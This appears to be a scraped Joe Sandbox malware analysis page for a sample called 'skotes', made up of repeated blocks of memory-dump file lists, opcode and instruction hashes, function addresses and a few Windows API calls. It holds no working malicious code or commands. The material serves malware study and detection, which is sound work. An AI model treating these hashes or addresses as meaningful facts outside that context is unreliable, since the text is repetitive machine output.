Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: 9c5335d8aadfbf8ab844ded87c4ffb3a0948197469da74f7391dc57896abf133
Instruction ID: 9434ed021c857ebde2c95631ffe1b00df8feaf96add5d97c4b82096cc14c467e
Opcode Fuzzy Hash: 9c5335d8aadfbf8ab844ded87c4ffb3a0948197469da74f7391dc57896abf133
Instruction Fuzzy Hash: 57319971B142008BEB08DB78DDC976DB766DBC6315F208718E824973D5CB3699888B2A

Function 0095A1AE Relevance: 4.6, APIs: 3, Instructions: 135sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0095A1B1
Sleep.KERNEL32(00000064,?), ref: 0095A963
CreateMutexA.KERNEL32(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: cc7717f96da1f1b7806e5bc351f85b8a77f9111c4d7b552afed59bbc66e86ba1
Instruction ID: fa5670a4f866f9dfb7358e6797b69c643336a7406344aca8d5338a67841d13ce
Opcode Fuzzy Hash: cc7717f96da1f1b7806e5bc351f85b8a77f9111c4d7b552afed59bbc66e86ba1
Instruction Fuzzy Hash: 73316871B042018FEB08DB68DDC975DB766ABC6311F208718E824973D5C73559888726

Function 0095A2E3 Relevance: 4.6, APIs: 3, Instructions: 134sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0095A2E6
Sleep.KERNEL32(00000064,?), ref: 0095A963
CreateMutexA.KERNEL32(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: faa67bf4ae410cb96e48985ec75ce68b7d52a2d222aa0430b0eabb06ba2e59ab
Instruction ID: 411dbb89450032b0e2d8992293b32dfaf5df61efb649783f05307af783cbee94
Opcode Fuzzy Hash: faa67bf4ae410cb96e48985ec75ce68b7d52a2d222aa0430b0eabb06ba2e59ab
Instruction Fuzzy Hash: BA318871B002008BEB08DB7CDDC976DBB76EBC6319F208718E824977D5C73699888726

Function 0095A418 Relevance: 4.6, APIs: 3, Instructions: 133sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0095A41B
Sleep.KERNEL32(00000064,?), ref: 0095A963
CreateMutexA.KERNEL32(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: 407569eae199e5014a33f126899a79676c3f6da0dbb6c6c43e86d6f86287d26a
Instruction ID: 6807b9d98ff4439841e093df872ac7479ab8234a8736bbd5a8cd98e723ba8ea3
Opcode Fuzzy Hash: 407569eae199e5014a33f126899a79676c3f6da0dbb6c6c43e86d6f86287d26a
Instruction Fuzzy Hash: C5316A71B002008BEB08EFB8DDC9B6EB766EFC5315F208318E8149B3D5CB755984876A

Function 0095A54D Relevance: 4.6, APIs: 3, Instructions: 132sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0095A550
Sleep.KERNEL32(00000064,?), ref: 0095A963
CreateMutexA.KERNEL32(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: 791940eafa181f496cabf6020090a03163c423979e22766ae6218f8f233ce9a6
Instruction ID: 170be5695c0e8e10598adaa7f0b983669a3bf638313173d92f35c0a5d4957d50
Opcode Fuzzy Hash: 791940eafa181f496cabf6020090a03163c423979e22766ae6218f8f233ce9a6
Instruction Fuzzy Hash: E0319B71B002008FEB08DB78DDC9B6DB766EFC5315F248718E8109B3D5DB3599858726

Function 0095A682 Relevance: 4.6, APIs: 3, Instructions: 131sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0095A685
Sleep.KERNEL32(00000064,?), ref: 0095A963
CreateMutexA.KERNEL32(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
